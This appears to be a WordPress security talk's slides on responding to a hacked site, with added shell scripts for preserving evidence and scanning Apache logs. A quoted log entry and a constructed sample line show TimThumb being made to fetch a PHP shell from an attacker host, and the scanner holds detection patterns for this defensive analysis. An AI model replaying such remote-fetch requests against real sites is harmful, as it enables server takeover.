This is the presentation which I used during the awesome "WPSession #11: Security for Site Owners". I shared important information about how site owners should react to website attacks. I talked about risk management, asset evaluation and getting help from the right people who know WordPress and care about security.
5. IN 2013, 61% OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
6. 77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY.
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
7. MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF OVER 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT.
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
8. THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012! (+700%)
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
9. ATTACKS PER DAY (chart)
2010: 190,000
2012: 464,000
2013: 570,000
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
14. IDENTIFY WHO CAN HELP YOU
• The support team of your web host
• Plugin and theme developers
• Third party companies
• Security specialists
15. THE SUPPORT TEAM OF YOUR WEB HOST
• Website diagnostics
• Website backups and restores
• Log analysis
• WordPress core/plugin/theme upgrades
• Regular Security Audits
• Malware notifications and malicious code cleaning
18. 7 "EASY" STEPS
1. DON’T PANIC!
2. Create a copy of the hacked site + all logs
3. Quarantine your site
4. Remove the malicious code
5. Check the archived logs for the source of the attack
6. Resolve the security issues that caused the problem
7. “Unquarantine” your site
19. 1. BACKUP YOUR HACKED SITE
How to back up:
1. mysqldump -uU -pP DB > yoursitefolder/DB.sql
2. tar zcvf backup.tar.gz yoursitefolder
(U, P and DB are the database user, password and name. Passing the password as -pP exposes it in the process list and in your shell history; on a shared server use an interactive -p prompt or --defaults-extra-file instead.)
Why do this:
This is needed so that you can later find out the source of the attack/vulnerability, so copy the site before anything is cleaned or changed!
20. USEFUL LOGS (on a cPanel server)
• /var/log/messages - FTP log for PureFTPd
• /usr/local/apache/domlogs/DOMAIN.COM - Apache access log
• /var/log/exim_mainlog - Exim mail server log
• /usr/local/cpanel/logs/access_log - cPanel File Manager log
• /var/log/secure - SSH connections log
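Added example, not from the deck: one shell function that does steps 1 (site + database) and the log collection from slide 20 in a single evidence-preserving pass. It assumes POSIX sh, tar, cp and sha256sum (or shasum) on the server; the function name snapshot_site, the MYSQLDUMP_CMD variable and the file naming are this example's own choices. The database dump command is supplied through MYSQLDUMP_CMD so that the password can live in a defaults file instead of on the command line.

```shell
#!/bin/sh
# Evidence snapshot of a hacked site: archive files, dump the DB, copy logs,
# hash everything and make it read-only. Example code, not the deck's own.
# Usage: snapshot_site OUTDIR SITEDIR [LOGFILE ...]
#   MYSQLDUMP_CMD="mysqldump --defaults-extra-file=/root/.my.cnf wpdb" \
#   snapshot_site /root/evidence /home/user/public_html \
#       /usr/local/apache/domlogs/example.com /var/log/messages /var/log/secure

sumtool() {   # sha256sum is GNU coreutils; shasum -a 256 is the BSD/macOS equivalent
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$@"; else shasum -a 256 "$@"; fi
}

snapshot_site() {
    outdir=$1; sitedir=$2; shift 2
    stamp=$(date -u +%Y%m%dT%H%M%SZ)      # one timestamp ties all pieces of evidence together
    mkdir -p "$outdir" || return 1
    files=""                                # space-separated list of produced file names (no spaces in names assumed)

    # Database: only when the caller supplied a dump command (keeps the password off the command line)
    if [ -n "$MYSQLDUMP_CMD" ]; then
        $MYSQLDUMP_CMD > "$outdir/db-$stamp.sql" || return 1
        files="db-$stamp.sql"
    fi

    # Files: archive the site exactly as it is. Do not clean anything first;
    # tar records owner, mode and mtime, and the mtimes date the compromise.
    tar -C "$(dirname "$sitedir")" -czf "$outdir/site-$stamp.tar.gz" "$(basename "$sitedir")" || return 1
    files="$files site-$stamp.tar.gz"

    # Logs: copy each one with its timestamp (cp -p); a missing log is reported, not silently skipped
    for log in "$@"; do
        if [ -f "$log" ]; then
            name="log$(printf '%s' "$log" | tr '/' '_')-$stamp"   # /var/log/messages -> log_var_log_messages-<stamp>
            cp -p "$log" "$outdir/$name" && files="$files $name"
        else
            echo "warning: $log not found" >&2
        fi
    done

    # Integrity: hashes let you show later that the evidence was not altered; then drop write permission
    ( cd "$outdir" && sumtool $files > "SHA256SUMS-$stamp" ) || return 1
    ( cd "$outdir" && chmod a-w $files "SHA256SUMS-$stamp" )
    echo "$stamp"
}
```

Verify a snapshot later with `cd OUTDIR && sha256sum -c SHA256SUMS-<stamp>`; keep the output directory outside the web root so the archive itself is never served.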
21. 2. QUARANTINE YOUR SITE + CHANGE PASSWORDS
1. Protect your users and visitors
2. Keep Google and other crawlers away from your hacked site (a 503 tells them to come back later instead of indexing the hacked pages)
3. Keep hackers away during the cleaning of the site
4. Change every password the attacker may have captured: WordPress users, database, FTP/SSH and the hosting control panel
22. USE .HTACCESS MAGIC
<IfModule mod_rewrite.c>
RewriteEngine On
# Your own IP: escape the dots and anchor it, otherwise 123.56.89.12 also matches 123x56x89x123
RewriteCond %{REMOTE_ADDR} !^123\.56\.89\.12$
# Both files must exist; delete maintenance.enable to lift the quarantine
RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f
RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f
RewriteCond %{REQUEST_URI} !^/maintenance\.html$
# For a non-3xx status mod_rewrite drops the substitution, so use "-"; ErrorDocument supplies the page
RewriteRule ^.*$ - [R=503,L]
ErrorDocument 503 /maintenance.html
</IfModule>
<IfModule mod_headers.c>
# "always" is required: a plain "Header set" only applies to 2xx responses, not to the 503
Header always set Retry-After "14400"
Header always set Cache-Control "max-age=0, no-store"
</IfModule>
23. 3. REMOVE THE MALICIOUS CODE
1. Restore the site from a clean backup
OR
2. Clean the affected files/database tables
24. 4. ARCHIVED LOGS ANALYSIS
• Is complicated
• Is time consuming
• Requires advanced HTTP knowledge
• Should be performed by security specialists
25. EXAMPLE - THE TIMTHUMB HACK
189.100.29.167 - [12/Apr/2014:06:53:41 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.exl.ro/max/wp-mails.php HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
189.100.29.167 - IP of the attacker.
premiumtheme/timthumb.php - Vulnerable script.
wp-mails.php - PHP shell script.
Why it worked: old TimThumb versions only checked that the remote host name contained a "trusted" domain such as blogger.com, so a host like www.blogger.com.<attacker domain> passed the check; the fetched file was written into TimThumb's cache directory and could then be executed as PHP.
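Added example, not from the deck: a small awk-based scanner, run from the shell against an Apache access log, that finds TimThumb abuse of the kind shown above. It flags two patterns: a remote src= host that merely contains a trusted domain name without ending in it (the whitelist bypass), and a remote src= that fetches a script (.php, .phtml, .txt) rather than an image. The whitelist below is the set of hosts old TimThumb trusted; the function names scan_timthumb and sample_log, the decoding of only the most common percent-escapes, and the four log lines (the slide's entry plus three constructed ones) are this example's own.

```shell
#!/bin/sh
# Scan an Apache access log (stdin) for TimThumb remote-fetch abuse.
# Output: <client ip> TAB <fetched URL> TAB <reason>. Example code, not the deck's own.
# Usage: scan_timthumb < /usr/local/apache/domlogs/example.com

scan_timthumb() {
    awk '
    # Only requests to timthumb.php (or renamed thumb.php copies) that carry a src= parameter
    tolower($0) ~ /thumb\.php\?[^ ]*src=/ {
        ip = $1
        split($0, q, "\"")              # q[2] is the request line between the first pair of quotes
        split(q[2], r, " ")             # r[2] is the request target (path?query)
        src = r[2]
        sub(/.*[?&]src=/, "", src)      # keep the src= value only
        sub(/&.*/, "", src)
        # decode the escapes attackers commonly use to hide the URL from naive grep
        gsub(/%3[aA]/, ":", src); gsub(/%2[fF]/, "/", src); gsub(/%2[eE]/, ".", src)
        if (src !~ "^https?://") next   # a local path is the normal use of TimThumb
        host = src
        sub("^https?://", "", host)
        split(host, hp, "/"); host = hp[1]
        sub(/[:?].*/, "", host)         # drop port or query
        reason = ""
        # Whitelist bypass: trusted name present somewhere in the host but the host does not end in it
        if (host ~ /(flickr|picasa|blogger|wordpress|photobucket)\.com|img\.youtube\.com|upload\.wikimedia\.com/ &&
            host !~ /(^|\.)((flickr|picasa|blogger|wordpress|photobucket)\.com|img\.youtube\.com|upload\.wikimedia\.com)$/)
            reason = "whitelist-lookalike host"
        else if (src ~ /\.(php|phtml|txt)([?&].*)?$/)
            reason = "remote script fetched"
        if (reason != "") printf "%s\t%s\t%s\n", ip, src, reason
    }'
}

sample_log() {   # constructed sample: the slide's line plus three invented ones (two benign, one obfuscated)
    cat <<'EOF'
189.100.29.167 - [12/Apr/2014:06:53:41 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.exl.ro/max/wp-mails.php HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
198.51.100.7 - - [12/Apr/2014:07:10:02 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=wp-content/uploads/2014/04/photo.jpg&w=300 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Apr/2014:07:12:45 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http://farm1.flickr.com/123/abc.jpg&w=300 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.44 - - [12/Apr/2014:07:30:11 +1000] "GET /wp-content/themes/other/thumb.php?src=http%3A%2F%2Fevil.example%2Fshell.txt&h=1 HTTP/1.1" 200 512 "-" "curl/7.30.0"
EOF
}

sample_log | scan_timthumb
```

The two hits (the blogger.com lookalike and the percent-encoded fetch of shell.txt) give you the attacker IPs to search for across the other logs from slide 20; the local thumbnail and the genuine flickr.com image are left alone.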
26. 5. RESOLVE THE SECURITY ISSUES
• Upgrade WP core, plugins and themes
• Upgrade server software if needed
• Patch your code and use a WAF in case there are no upgrades available
27. 6. UNQUARANTINE YOUR SITE + CHANGE PASSWORDS
• Remove the maintenance page
• Inform users about the breach if needed
• Keep an eye on your files/DB
28. CONCLUSION
• Web security is complicated!
• Rely on partners to recover your site.
• Be ready to manage the whole process.
• Know your assets.
• Make sure you have good security awareness.
• Security is a journey - NOT a destination!